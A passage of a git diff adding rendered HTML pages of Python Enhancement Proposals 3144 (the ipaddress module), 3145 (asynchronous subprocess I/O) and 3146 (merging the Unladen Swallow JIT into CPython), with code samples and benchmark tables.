  • A number of methods and functions which returned containers in ipaddr now +return iterators. This includes subnets, address_exclude, +summarize_address_range and collapse_address_list.
  • +
+
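Two of these differences can be seen directly (using the ipaddress +module as it shipped in Python 3.3; illustrative only):

+
import ipaddress
+
+# *Network is strict: host bits set is an error ...
+try:
+    ipaddress.IPv4Network('192.0.2.1/24')
+except ValueError as exc:
+    print(exc)               # 192.0.2.1/24 has host bits set
+
+# ... while *Interface plays ipaddr's strict=False role.
+print(ipaddress.IPv4Interface('192.0.2.1/24'))   # 192.0.2.1/24
+
+# subnets() now returns an iterator rather than a list.
+print(next(ipaddress.IPv4Network('192.0.2.0/24').subnets()))   # 192.0.2.0/25
+
+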

Due to the backwards incompatible API changes between ipaddress and ipaddr, +the proposal is to add the module using the new provisional API status:

+ +

Relevant messages on python-dev:

+ +
+
+

Specification

+

The ipaddr module defines a total of 6 new public classes, 3 for +manipulating IPv4 objects and 3 for manipulating IPv6 objects. +The classes are as follows (a usage sketch follows the list):

+
    +
  • IPv4Address/IPv6Address - These define individual addresses, for +example the IPv4 address returned by an A record query for +www.google.com (74.125.224.84) or the IPv6 address returned by a +AAAA record query for ipv6.google.com (2001:4860:4001:801::1011).
  • +
  • IPv4Network/IPv6Network - These define networks or groups of +addresses, for example the IPv4 network reserved for multicast use +(224.0.0.0/4) or the IPv6 network reserved for multicast +(ff00::/8, wow, that’s big).
  • +
  • IPv4Interface/IPv6Interface - These hybrid classes refer to an +individual address on a given network. For example, the IPV4 +address 192.0.2.1 on the network 192.0.2.0/24 could be referred to +as 192.0.2.1/24. Likewise, the IPv6 address 2001:DB8::1 on the +network 2001:DB8::/96 could be referred to as 2001:DB8::1/96. +It’s very common to refer to addresses assigned to computer +network interfaces like this, hence the Interface name.
  • +
+
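For illustration, the three kinds of class can be used together like +this (shown with the ipaddress module as it eventually shipped in +Python 3.3):

+
import ipaddress
+
+addr = ipaddress.IPv4Address('192.0.2.1')
+net = ipaddress.IPv4Network('192.0.2.0/24')
+iface = ipaddress.IPv4Interface('192.0.2.1/24')
+
+print(addr in net)            # True: membership testing on networks
+print(iface.network == net)   # True: an Interface knows its Network
+print(iface.ip == addr)       # True: ... and its Address
+
+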

All IPv4 classes share certain characteristics and methods: the +number of bits needed to represent them, whether or not they +belong to certain special IPv4 network ranges, etc. Similarly, +all IPv6 classes share characteristics and methods.

+

ipaddr makes extensive use of inheritance to avoid code +duplication as much as possible. The parent classes are private, +but they are outlined here:

+
    +
  • _IPAddrBase - Provides methods common to all ipaddr objects.
  • +
  • _BaseAddress - Provides methods common to IPv4Address and +IPv6Address.
  • +
  • _BaseInterface - Provides methods common to IPv4Interface and +IPv6Interface, as well as IPv4Network and IPv6Network (ipaddr +treats the Network classes as a special case of Interface).
  • +
  • _BaseV4 - Provides methods and variables (eg, _max_prefixlen) +common to all IPv4 classes.
  • +
  • _BaseV6 - Provides methods and variables common to all IPv6 classes.
  • +
+

Comparisons between objects of differing IP versions result in a +TypeError [1]. Additionally, comparisons of objects with +different _Base parent classes result in a TypeError. The effect +of the _Base parent class limitation is that IPv4Interfaces can +be compared to IPv4Networks and IPv6Interfaces can be compared +to IPv6Networks.
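For example (with the module as shipped; ordering comparisons across +versions raise, as described):

+
import ipaddress
+
+v4 = ipaddress.IPv4Address('192.0.2.1')
+v6 = ipaddress.IPv6Address('2001:db8::1')
+v4 < v6   # raises TypeError: ... are not of the same version
+
+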

+
+
+

Reference Implementation

+

The current reference implementation can be found at:

+

http://code.google.com/p/ipaddress-py/source/browse/ipaddress.py

+

Or see the tarball to include the README and unittests. +http://code.google.com/p/ipaddress-py/downloads/detail?name=ipaddress-1.0.tar.gz

+

More information about using the reference implementation can be +found at: http://code.google.com/p/ipaddr-py/wiki/Using3144

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3144.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3145/index.html b/pep-3145/index.html new file mode 100644 index 00000000000..6d2aef4438c --- /dev/null +++ b/pep-3145/index.html @@ -0,0 +1,273 @@ + + + + + + + + PEP 3145 – Asynchronous I/O For subprocess.Popen | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3145 – Asynchronous I/O For subprocess.Popen

+
+
Author:
+
Eric Pruitt, Charles R. McCreary, Josiah Carlson
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Aug-2009
+
Python-Version:
+
3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

In its present form, the subprocess.Popen implementation is prone to +deadlocking and to blocking the parent Python script while waiting on data +from the child process. This PEP proposes to make +subprocess.Popen more asynchronous to help alleviate these +problems.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +at least until after PEP 3156 has been resolved.

+
+
+

PEP Withdrawal

+

This can be dealt with in the bug tracker. A specific proposal is +attached to [11].

+
+
+

Motivation

+

A search for “python asynchronous subprocess” will turn up numerous +accounts of people wanting to execute a child process and communicate with +it from time to time, reading only the data that is available instead of +blocking to wait for the program to produce data [1] [2] [3]. The current +behavior of the subprocess module is that when a user sends or receives +data via the stdin, stderr and stdout file objects, deadlocks are common +and documented [4] [5]. While communicate can be used to alleviate some of +the buffering issues, it will still cause the parent process to block while +attempting to read data when none is available to be read from the child +process.

+
+
+

Rationale

+

There is a documented need for asynchronous, non-blocking functionality in +subprocess.Popen [6] [7] [2] [3]. Inclusion of the code would improve the +utility of the Python standard library that can be used on Unix based and +Windows builds of Python. Practically every I/O object in Python has a +file-like wrapper of some sort. Sockets already act as such and for +strings there is StringIO. Popen can be made to act like a file by simply +using the methods attached to the subprocess.Popen.stderr, stdout and +stdin file-like objects. But when using the read and write methods of +those objects, you do not have the benefit of asynchronous I/O. In the +proposed solution the wrapper wraps the asynchronous methods to mimic a +file object.

+
+
+

Reference Implementation

+

I have been maintaining a Google Code repository that contains all of my +changes, including tests and documentation [9], as well as a blog detailing +the problems I have come across in the development process [10].

+

I have been working on implementing non-blocking asynchronous I/O in the +subprocess module as well as a wrapper class for subprocess.Popen +that makes it so that an executed process can take the place of a file by +duplicating all of the methods and attributes that file objects have.

+

There are two base functions that have been added to the subprocess.Popen +class: Popen.send and Popen._recv, each with two separate implementations, +one for Windows and one for Unix-based systems. The Windows +implementation uses ctypes to access the functions needed to control pipes +in the kernel32 DLL in an asynchronous manner. On Unix-based systems, +the Python interface for file control serves the same purpose. The +different implementations of Popen.send and Popen._recv have identical +arguments to make code that uses these functions work across multiple +platforms.

+

When calling the Popen._recv function, it requires the pipe name be +passed as an argument, so there exists the Popen.recv function, which +selects stdout as the pipe for Popen._recv by default. Popen.recv_err +selects stderr as the pipe by default. Popen.recv and Popen.recv_err +are much easier to read and understand than Popen._recv('stdout' ...) and +Popen._recv('stderr' ...) respectively.
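In other words, the convenience methods are thin wrappers around +Popen._recv (a hypothetical sketch; the exact signatures in the +reference implementation may differ):

+
import subprocess
+
+class Popen(subprocess.Popen):
+    """Sketch: recv/recv_err delegate to _recv with a pipe name."""
+
+    def recv(self, *args, **kwargs):
+        return self._recv('stdout', *args, **kwargs)
+
+    def recv_err(self, *args, **kwargs):
+        return self._recv('stderr', *args, **kwargs)
+
+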

+

Since the Popen._recv function does not wait on data to be produced +before returning a value, it may return empty bytes. Popen.asyncread +handles this issue by returning all data read over a given time +interval.

+

The ProcessIOWrapper class uses the asyncread and asyncwrite functions to +allow a process to act like a file so that there are no blocking issues +that can arise from using the stdout and stdin file objects produced from +a subprocess.Popen call.

+
+
+

References

+ +

[8] subprocess.rst - subprocdev - Project Hosting on Google Code + https://web.archive.org/web/20130306074135/http://code.google.com/p/subprocdev/source/browse/doc/subprocess.rst?spec=svn2c925e935cad0166d5da85e37c742d8e7f609de5&r=2c925e935cad0166d5da85e37c742d8e7f609de5

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3145.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3146/index.html b/pep-3146/index.html new file mode 100644 index 00000000000..512c2c2324b --- /dev/null +++ b/pep-3146/index.html @@ -0,0 +1,1788 @@ + + + + + + + + PEP 3146 – Merging Unladen Swallow into CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3146 – Merging Unladen Swallow into CPython

+
+
Author:
+
Collin Winter <collinwinter at google.com>, +Jeffrey Yasskin <jyasskin at google.com>, +Reid Kleckner <rnk at mit.edu>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2010
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

With Unladen Swallow going the way of the Norwegian Blue [1] +[2], this PEP has been deemed to have been withdrawn.

+
+
+

Abstract

+

This PEP proposes the merger of the Unladen Swallow project [3] into +CPython’s source tree. Unladen Swallow is an open-source branch of CPython +focused on performance. Unladen Swallow is source-compatible with valid Python +2.6.4 applications and C extension modules.

+

Unladen Swallow adds a just-in-time (JIT) compiler to CPython, allowing for the +compilation of selected Python code to optimized machine code. Beyond classical +static compiler optimizations, Unladen Swallow’s JIT compiler takes advantage of +data collected at runtime to make checked assumptions about code behaviour, +allowing the production of faster machine code.

+

This PEP proposes to integrate Unladen Swallow into CPython’s development tree +in a separate py3k-jit branch, targeted for eventual merger with the main +py3k branch. While Unladen Swallow is by no means finished or perfect, we +feel that Unladen Swallow has reached sufficient maturity to warrant +incorporation into CPython’s roadmap. We have sought to create a stable platform +that the wider CPython development team can build upon, a platform that will +yield increasing performance for years to come.

+

This PEP will detail Unladen Swallow’s implementation and how it differs from +CPython 2.6.4; the benchmarks used to measure performance; the tools used to +ensure correctness and compatibility; the impact on CPython’s current platform +support; and the impact on the CPython core development process. The PEP +concludes with a proposed merger plan and brief notes on possible directions +for future work.

+

We seek the following from the BDFL:

+
    +
• Approval for the overall concept of adding a just-in-time compiler to CPython, following the design laid out below.
• Permission to continue working on the just-in-time compiler in the CPython source tree.
• Permission to eventually merge the just-in-time compiler into the py3k branch once all blocking issues [31] have been addressed.
• A pony.
+
+
+

Rationale, Implementation

+

Many companies and individuals would like Python to be faster, to enable its +use in more projects. Google is one such company.

+

Unladen Swallow is a Google-sponsored branch of CPython, initiated to improve +the performance of Google’s numerous Python libraries, tools and applications. +To make the adoption of Unladen Swallow as easy as possible, the project +initially aimed at four goals:

+
    +
• A performance improvement of 5x over the baseline of CPython 2.6.4 for single-threaded code.
• 100% source compatibility with valid CPython 2.6 applications.
• 100% source compatibility with valid CPython 2.6 C extension modules.
• Design for eventual merger back into CPython.
+

We chose 2.6.4 as our baseline because Google uses CPython 2.4 internally, and +jumping directly from CPython 2.4 to CPython 3.x was considered infeasible.

+

To achieve the desired performance, Unladen Swallow has implemented a +just-in-time (JIT) compiler [51] in the tradition of Urs Hoelzle’s work on +Self [52], gathering feedback at runtime and using that to inform +compile-time optimizations. This is similar to the approach taken by the current +breed of JavaScript engines [59], [60]; most Java virtual +machines [64]; Rubinius [61], MacRuby [63], and other Ruby +implementations; Psyco [65]; and others.

+

We explicitly reject any suggestion that our ideas are original. We have sought +to reuse the published work of other researchers wherever possible. If we have +done any original work, it is by accident. We have tried, as much as possible, +to take good ideas from all corners of the academic and industrial community. A +partial list of the research papers that have informed Unladen Swallow is +available on the Unladen Swallow wiki [54].

+

The key observation about optimizing dynamic languages is that they are only +dynamic in theory; in practice, each individual function or snippet of code is +relatively static, using a stable set of types and child functions. The current +CPython bytecode interpreter assumes the worst about the code it is running, +that at any moment the user might override the len() function or pass a +never-before-seen type into a function. In practice this never happens, but user +code pays for that support. Unladen Swallow takes advantage of the relatively +static nature of user code to improve performance.

+

At a high level, the Unladen Swallow JIT compiler works by translating a +function’s CPython bytecode to platform-specific machine code, using data +collected at runtime, as well as classical compiler optimizations, to improve +the quality of the generated machine code. Because we only want to spend +resources compiling Python code that will actually benefit the runtime of the +program, an online heuristic is used to assess how hot a given function is. Once +the hotness value for a function crosses a given threshold, it is selected for +compilation and optimization. Until a function is judged hot, however, it runs +in the standard CPython eval loop, which in Unladen Swallow has been +instrumented to record interesting data about each bytecode executed. This +runtime data is used to reduce the flexibility of the generated machine code, +allowing us to optimize for the common case. For example, we collect data on

+
    +
• Whether a branch was taken/not taken. If a branch is never taken, we will not compile it to machine code.
• Types used by operators. If we find that a + b is only ever adding integers, the generated machine code for that snippet will not support adding floats.
• Functions called at each callsite. If we find that a particular foo() callsite is always calling the same foo function, we can optimize the call or inline it away.
+

Refer to [55] for a complete list of data points gathered and how +they are used.

+

However, if by chance the historically-untaken branch is now taken, or some +integer-optimized a + b snippet receives two strings, we must support this. +We cannot change Python semantics. Each of these sections of optimized machine +code is preceded by a guard, which checks whether the simplifying +assumptions we made when optimizing still hold. If the assumptions are still +valid, we run the optimized machine code; if they are not, we revert back to +the interpreter and pick up where we left off.
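
To make the mechanism concrete, here is a toy pure-Python model of the hotness-and-guards scheme just described; the threshold value, attribute names and helper functions are all invented for illustration, not Unladen Swallow's actual (C++) implementation:

# Toy model of the hot-function / guard scheme described above.
# HOTNESS_THRESHOLD, FunctionState and compile_specialized are invented
# names; the real machinery lives in C++ inside the instrumented eval loop.
HOTNESS_THRESHOLD = 10000

class FunctionState(object):
    def __init__(self):
        self.hotness = 0          # bumped on every call
        self.machine_code = None  # set once the function is judged hot
        self.assumed_type = None  # feedback recorded while interpreting

def compile_specialized(assumed_type):
    # Stand-in for the real pipeline: bytecode -> LLVM IR -> machine code,
    # specialized under the assumption that arguments have assumed_type.
    def specialized(arg):
        return arg + arg
    return specialized

def call(state, interpret, arg):
    state.hotness += 1
    if state.machine_code is None:
        if state.assumed_type is None:
            state.assumed_type = type(arg)   # gather runtime feedback
        if state.hotness > HOTNESS_THRESHOLD:
            state.machine_code = compile_specialized(state.assumed_type)
        return interpret(arg)                # not hot yet: interpret
    # Guard: check that the simplifying assumption still holds.
    if type(arg) is state.assumed_type:
        return state.machine_code(arg)       # optimized machine-code path
    return interpret(arg)                    # assumption violated: bail out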

+

We have chosen to reuse a set of existing compiler libraries called LLVM +[4] for code generation and code optimization. This has saved our small +team from needing to understand and debug code generation on multiple machine +instruction sets and from needing to implement a large set of classical compiler +optimizations. The project would not have been possible without such code reuse. +We have found LLVM easy to modify and its community receptive to our suggestions +and modifications.

+

In somewhat more depth, Unladen Swallow’s JIT works by compiling CPython +bytecode to LLVM’s own intermediate representation (IR) [95], taking +into account any runtime data from the CPython eval loop. We then run a set of +LLVM’s built-in optimization passes, producing a smaller, optimized version of +the original LLVM IR. LLVM then lowers the IR to platform-specific machine code, +performing register allocation, instruction scheduling, and any necessary +relocations. This arrangement of the compilation pipeline allows the LLVM-based +JIT to be easily omitted from a compiled python binary by passing +--without-llvm to ./configure; various use cases for this flag are +discussed later.
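
The input to this pipeline is ordinary CPython bytecode, which can be inspected with the standard dis module (this example uses only stock CPython; the exact opcode names vary by version):

import dis

def add(a, b):
    return a + b

# Under Unladen Swallow, a hot `add` would have bytecode like this
# translated to LLVM IR and then lowered to native machine code.
dis.dis(add)
# Representative output (opcode names vary across CPython versions):
#   LOAD_FAST     a
#   LOAD_FAST     b
#   BINARY_ADD
#   RETURN_VALUE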

+

For a complete detailing of how Unladen Swallow works, consult the Unladen +Swallow documentation [53], [55].

+

Unladen Swallow has focused on improving the performance of single-threaded, +pure-Python code. We have not made an effort to remove CPython’s global +interpreter lock (GIL); we feel this is separate from our work, and due to its +sensitivity, is best done in a mainline development branch. We considered +making GIL-removal a part of Unladen Swallow, but were concerned by the +possibility of introducing subtle bugs when porting our work from CPython 2.6 +to 3.x.

+

A JIT compiler is an extremely versatile tool, and we have by no means +exhausted its full potential. We have tried to create a sufficiently flexible +framework that the wider CPython development community can build upon it for +years to come, extracting increased performance in each subsequent release.

+
+

Alternatives

+

There are a number of alternative strategies for improving Python performance which we considered, but found unsatisfactory.

+
    +
• Cython, Shedskin: Cython [102] and Shedskin [103] are both static compilers for Python. We view these as useful-but-limited workarounds for CPython’s historically-poor performance. Shedskin does not support the full Python standard library [104], while Cython requires manual Cython-specific annotations for optimum performance.
  Static compilers like these are useful for writing extension modules without worrying about reference counting, but because they are static, ahead-of-time compilers, they cannot optimize the full range of code under consideration by a just-in-time compiler informed by runtime data.
• IronPython: IronPython [107] is Python on Microsoft’s .Net platform. It is not actively tested on Mono [108], meaning that it is essentially Windows-only, making it unsuitable as a general CPython replacement.
• Jython: Jython [109] is a complete implementation of Python 2.5, but is significantly slower than Unladen Swallow (3-5x on measured benchmarks) and has no support for CPython extension modules [110], which would make migration of large applications prohibitively expensive.
• Psyco: Psyco [65] is a specializing JIT compiler for CPython, implemented as an extension module. It primarily improves performance for numerical code. Pros: exists; makes some code faster. Cons: 32-bit only, with no plans for 64-bit support; supports x86 only; very difficult to maintain; incompatible with SSE2 optimized code due to alignment issues.
• PyPy: PyPy [66] has good performance on numerical code, but is slower than Unladen Swallow on some workloads. Migration of large applications from CPython to PyPy would be prohibitively expensive: PyPy’s JIT compiler supports only 32-bit x86 code generation; important modules, such as MySQLdb and pycrypto, do not build against PyPy; PyPy does not offer an embedding API, much less the same API as CPython.
• PyV8: PyV8 [111] is an alpha-stage experimental Python-to-JavaScript compiler that runs on top of V8. PyV8 does not implement the whole Python language, and has no support for CPython extension modules.
• WPython: WPython [105] is a wordcode-based reimplementation of CPython’s interpreter loop. While it provides a modest improvement to interpreter performance [106], it is not an either-or substitute for a just-in-time compiler. An interpreter will never be as fast as optimized machine code. We view WPython and similar interpreter enhancements as complementary to our work, rather than as competitors.
+
+
+
+

Performance

+
+

Benchmarks

+

Unladen Swallow has developed a fairly large suite of benchmarks, ranging from +synthetic microbenchmarks designed to test a single feature up through +whole-application macrobenchmarks. The inspiration for these benchmarks has come +variously from third-party contributors (in the case of the html5lib +benchmark), Google’s own internal workloads (slowspitfire, pickle, +unpickle), as well as tools and libraries in heavy use throughout the wider +Python community (django, 2to3, spambayes). These benchmarks are run +through a single interface called perf.py that takes care of collecting +memory usage information, graphing performance, and running statistics on the +benchmark results to ensure significance.

+

The full list of available benchmarks is available on the Unladen Swallow wiki +[43], including instructions on downloading and running the +benchmarks for yourself. All our benchmarks are open-source; none are +Google-proprietary. We believe this collection of benchmarks serves as a useful +tool to benchmark any complete Python implementation, and indeed, PyPy is +already using these benchmarks for their own performance testing +[81], [96]. We welcome this, and we seek +additional workloads for the benchmark suite from the Python community.

+

We have focused our efforts on collecting macrobenchmarks and benchmarks that +simulate real applications as well as possible, when running a whole application +is not feasible. Along a different axis, our benchmark collection originally +focused on the kinds of workloads seen by Google’s Python code (webapps, text +processing), though we have since expanded the collection to include workloads +Google cares nothing about. We have so far shied away from heavily numerical +workloads, since NumPy [80] already does an excellent job on such code and +so improving numerical performance was not an initial high priority for the +team; we have begun to incorporate such benchmarks into the collection +[97] and have started work on optimizing numerical Python code.

+

Beyond these benchmarks, there are also a variety of workloads we are explicitly not interested in benchmarking. Unladen Swallow is focused on improving the performance of pure-Python code, so the performance of extension modules like NumPy is uninteresting since NumPy’s core routines are implemented in C. Similarly, workloads that involve a lot of IO like GUIs, databases or socket-heavy applications would, we feel, fail to accurately measure interpreter or code generation optimizations. That said, there is certainly room to improve the performance of C-language extension modules in the standard library, and as such, we have added benchmarks for the cPickle and re modules.

+
+
+

Performance vs CPython 2.6.4

+

The charts below compare the arithmetic mean of multiple benchmark iterations +for CPython 2.6.4 and Unladen Swallow. perf.py gathers more data than this, +and indeed, arithmetic mean is not the whole story; we reproduce only the mean +for the sake of conciseness. We include the t score from the Student’s +two-tailed T-test [44] at the 95% confidence interval to indicate +the significance of the result. Most benchmarks are run for 100 iterations, +though some longer-running whole-application benchmarks are run for fewer +iterations.
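
For readers unfamiliar with the statistic, a minimal sketch of a pooled-variance two-sample t score follows; this illustrates the idea, and is not necessarily perf.py's exact implementation:

import math

def t_score(sample_a, sample_b):
    # Pooled-variance two-sample Student's t statistic.
    n_a, n_b = len(sample_a), len(sample_b)
    mean_a = sum(sample_a) / float(n_a)
    mean_b = sum(sample_b) / float(n_b)
    var_a = sum((x - mean_a) ** 2 for x in sample_a) / (n_a - 1)
    var_b = sum((x - mean_b) ** 2 for x in sample_b) / (n_b - 1)
    pooled = ((n_a - 1) * var_a + (n_b - 1) * var_b) / (n_a + n_b - 2)
    return (mean_a - mean_b) / math.sqrt(pooled * (1.0 / n_a + 1.0 / n_b))

# The resulting t is compared against the critical value for
# n_a + n_b - 2 degrees of freedom at the 95% confidence level.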

+

A description of each of these benchmarks is available on the Unladen Swallow +wiki [43].

+

Command:

+
./perf.py -r -b default,apps ../a/python ../b/python
+
+
+

32-bit; gcc 4.0.3; Ubuntu Dapper; Intel Core2 Duo 6600 @ 2.4GHz; 2 cores; 4MB L2 cache; 4GB RAM

Benchmark     CPython 2.6.4  Unladen Swallow r988  Change        Significance   Timeline
2to3          25.13 s        24.87 s               1.01x faster  t=8.94         http://tinyurl.com/yamhrpg
django        1.08 s         0.80 s                1.35x faster  t=315.59       http://tinyurl.com/y9mrn8s
html5lib      14.29 s        13.20 s               1.08x faster  t=2.17         http://tinyurl.com/y8tyslu
nbody         0.51 s         0.28 s                1.84x faster  t=78.007       http://tinyurl.com/y989qhg
rietveld      0.75 s         0.55 s                1.37x faster  Insignificant  http://tinyurl.com/ye7mqd3
slowpickle    0.75 s         0.55 s                1.37x faster  t=20.78        http://tinyurl.com/ybrsfnd
slowspitfire  0.83 s         0.61 s                1.36x faster  t=2124.66      http://tinyurl.com/yfknhaw
slowunpickle  0.33 s         0.26 s                1.26x faster  t=15.12        http://tinyurl.com/yzlakoo
spambayes     0.31 s         0.34 s                1.10x slower  Insignificant  http://tinyurl.com/yem62ub
+

64-bit; gcc 4.2.4; Ubuntu Hardy; AMD Opteron 8214 HE @ 2.2 GHz; 4 cores; 1MB L2 cache; 8GB RAM

Benchmark     CPython 2.6.4  Unladen Swallow r988  Change        Significance   Timeline
2to3          31.98 s        30.41 s               1.05x faster  t=8.35         http://tinyurl.com/ybcrl3b
django        1.22 s         0.94 s                1.30x faster  t=106.68       http://tinyurl.com/ybwqll6
html5lib      18.97 s        17.79 s               1.06x faster  t=2.78         http://tinyurl.com/yzlyqvk
nbody         0.77 s         0.27 s                2.86x faster  t=133.49       http://tinyurl.com/yeyqhbg
rietveld      0.74 s         0.80 s                1.08x slower  t=-2.45        http://tinyurl.com/yzjc6ff
slowpickle    0.91 s         0.62 s                1.48x faster  t=28.04        http://tinyurl.com/yf7en6k
slowspitfire  1.01 s         0.72 s                1.40x faster  t=98.70        http://tinyurl.com/yc8pe2o
slowunpickle  0.51 s         0.34 s                1.51x faster  t=32.65        http://tinyurl.com/yjufu4j
spambayes     0.43 s         0.45 s                1.06x slower  Insignificant  http://tinyurl.com/yztbjfp
+

Many of these benchmarks take a hit under Unladen Swallow because the current +version blocks execution to compile Python functions down to machine code. This +leads to the behaviour seen in the timeline graphs for the html5lib and +rietveld benchmarks, for example, and slows down the overall performance of +2to3. We have an active development branch to fix this problem +([46], [47]), but working within +the strictures of CPython’s current threading system has complicated the process +and required far more care and time than originally anticipated. We view this +issue as critical to final merger into the py3k branch.

+

We have obviously not met our initial goal of a 5x performance improvement. A +performance retrospective follows, which addresses why we failed to meet our +initial performance goal. We maintain a list of yet-to-be-implemented +performance work [50].

+
+
+

Memory Usage

+

The following table shows maximum memory usage (in kilobytes) for each of +Unladen Swallow’s default benchmarks for both CPython 2.6.4 and Unladen Swallow +r988, as well as a timeline of memory usage across the lifetime of the +benchmark. We include tables for both 32- and 64-bit binaries. Memory usage was +measured on Linux 2.6 systems by summing the Private_ sections from the +kernel’s /proc/$pid/smaps pseudo-files [45].
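
A minimal sketch of that measurement (assuming a Linux 2.6+ /proc layout; perf.py's actual code may differ):

def private_kb(pid):
    # Sum the Private_Clean and Private_Dirty fields (reported in kB)
    # from the kernel's smaps pseudo-file for one process.
    total = 0
    with open('/proc/%d/smaps' % pid) as smaps:
        for line in smaps:
            # Lines look like: "Private_Dirty:      1024 kB"
            if line.startswith('Private_'):
                total += int(line.split()[1])
    return total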

+

Command:

+
./perf.py -r --track_memory -b default,apps ../a/python ../b/python
+
+
+

32-bit

Benchmark     CPython 2.6.4  Unladen Swallow r988  Change  Timeline
2to3          26396 kb       46896 kb              1.77x   http://tinyurl.com/yhr2h4z
django        10028 kb       27740 kb              2.76x   http://tinyurl.com/yhan8vs
html5lib      150028 kb      173924 kb             1.15x   http://tinyurl.com/ybt44en
nbody         3020 kb        16036 kb              5.31x   http://tinyurl.com/ya8hltw
rietveld      15008 kb       46400 kb              3.09x   http://tinyurl.com/yhd5dra
slowpickle    4608 kb        16656 kb              3.61x   http://tinyurl.com/ybukyvo
slowspitfire  85776 kb       97620 kb              1.13x   http://tinyurl.com/y9vj35z
slowunpickle  3448 kb        13744 kb              3.98x   http://tinyurl.com/yexh4d5
spambayes     7352 kb        46480 kb              6.32x   http://tinyurl.com/yem62ub
+

64-bit

Benchmark     CPython 2.6.4  Unladen Swallow r988  Change  Timeline
2to3          51596 kb       82340 kb              1.59x   http://tinyurl.com/yljg6rs
django        16020 kb       38908 kb              2.43x   http://tinyurl.com/ylqsebh
html5lib      259232 kb      324968 kb             1.25x   http://tinyurl.com/yha6oee
nbody         4296 kb        23012 kb              5.35x   http://tinyurl.com/yztozza
rietveld      24140 kb       73960 kb              3.06x   http://tinyurl.com/ybg2nq7
slowpickle    4928 kb        23300 kb              4.73x   http://tinyurl.com/yk5tpbr
slowspitfire  133276 kb      148676 kb             1.11x   http://tinyurl.com/y8bz2xe
slowunpickle  4896 kb        16948 kb              3.46x   http://tinyurl.com/ygywwoc
spambayes     10728 kb       84992 kb              7.92x   http://tinyurl.com/yhjban5
+

The increased memory usage comes from a) LLVM code generation, analysis and +optimization libraries; b) native code; c) memory usage issues or leaks in +LLVM; d) data structures needed to optimize and generate machine code; e) +as-yet uncategorized other sources.

+

While we have made significant progress in reducing memory usage since the +initial naive JIT implementation [42], there is obviously more +to do. We believe that there are still memory savings to be made without +sacrificing performance. We have tended to focus on raw performance, and we +have not yet made a concerted push to reduce memory usage. We view reducing +memory usage as a blocking issue for final merger into the py3k branch. We +seek guidance from the community on an acceptable level of increased memory +usage.

+
+
+

Start-up Time

+

Statically linking LLVM’s code generation, analysis and optimization libraries +increases the time needed to start the Python binary. C++ static initializers +used by LLVM also increase start-up time, as does importing the collection of +pre-compiled C runtime routines we want to inline to Python code.

+

Results from Unladen Swallow’s startup benchmarks:

+
$ ./perf.py -r -b startup /tmp/cpy-26/bin/python /tmp/unladen/bin/python
+
+### normal_startup ###
+Min: 0.219186 -> 0.352075: 1.6063x slower
+Avg: 0.227228 -> 0.364384: 1.6036x slower
+Significant (t=-51.879098, a=0.95)
+Stddev: 0.00762 -> 0.02532: 3.3227x larger
+Timeline: http://tinyurl.com/yfe8z3r
+
+### startup_nosite ###
+Min: 0.105949 -> 0.264912: 2.5004x slower
+Avg: 0.107574 -> 0.267505: 2.4867x slower
+Significant (t=-703.557403, a=0.95)
+Stddev: 0.00214 -> 0.00240: 1.1209x larger
+Timeline: http://tinyurl.com/yajn8fa
+
+### bzr_startup ###
+Min: 0.067990 -> 0.097985: 1.4412x slower
+Avg: 0.084322 -> 0.111348: 1.3205x slower
+Significant (t=-37.432534, a=0.95)
+Stddev: 0.00793 -> 0.00643: 1.2330x smaller
+Timeline: http://tinyurl.com/ybdm537
+
+### hg_startup ###
+Min: 0.016997 -> 0.024997: 1.4707x slower
+Avg: 0.026990 -> 0.036772: 1.3625x slower
+Significant (t=-53.104502, a=0.95)
+Stddev: 0.00406 -> 0.00417: 1.0273x larger
+Timeline: http://tinyurl.com/ycout8m
+
+
+

bzr_startup and hg_startup measure how long it takes Bazaar and +Mercurial, respectively, to display their help screens. startup_nosite +runs python -S many times; usage of the -S option is rare, but we feel +this gives a good indication of where increased startup time is coming from.

+

Unladen Swallow has made headway toward optimizing startup time, but there is +still more work to do and further optimizations to implement. Improving start-up +time is a high-priority item [33] in Unladen Swallow’s +merger punchlist.

+
+
+

Binary Size

+

Statically linking LLVM’s code generation, analysis and optimization libraries +significantly increases the size of the python binary. The tables below +report stripped on-disk binary sizes; the binaries are stripped to better +correspond with the configurations used by system package managers. We feel this +is the most realistic measure of any change in binary size.

Binary size  CPython 2.6.4  CPython 3.1.1  Unladen Swallow r1041
32-bit       1.3M           1.4M           12M
64-bit       1.6M           1.6M           12M
+

The increased binary size is caused by statically linking LLVM’s code +generation, analysis and optimization libraries into the python binary. +This can be straightforwardly addressed by modifying LLVM to better support +shared linking and then using that, instead of the current static linking. For +the moment, though, static linking provides an accurate look at the cost of +linking against LLVM.

+

Even when statically linking, we believe there is still headroom to improve +on-disk binary size by narrowing Unladen Swallow’s dependencies on LLVM. This +issue is actively being addressed [32].

+
+
+

Performance Retrospective

+

Our initial goal for Unladen Swallow was a 5x performance improvement over CPython 2.6. We did not hit that goal, nor, to put it bluntly, did we even come close. Why did the project not hit that goal, and can an LLVM-based JIT ever hit that goal?

+

Why did Unladen Swallow not achieve its 5x goal? The primary reason was +that LLVM required more work than we had initially anticipated. Based on the +fact that Apple was shipping products based on LLVM [82], and +other high-level languages had successfully implemented LLVM-based JITs +([61], [63], [83]), we had assumed that LLVM’s JIT was +relatively free of show-stopper bugs.

+

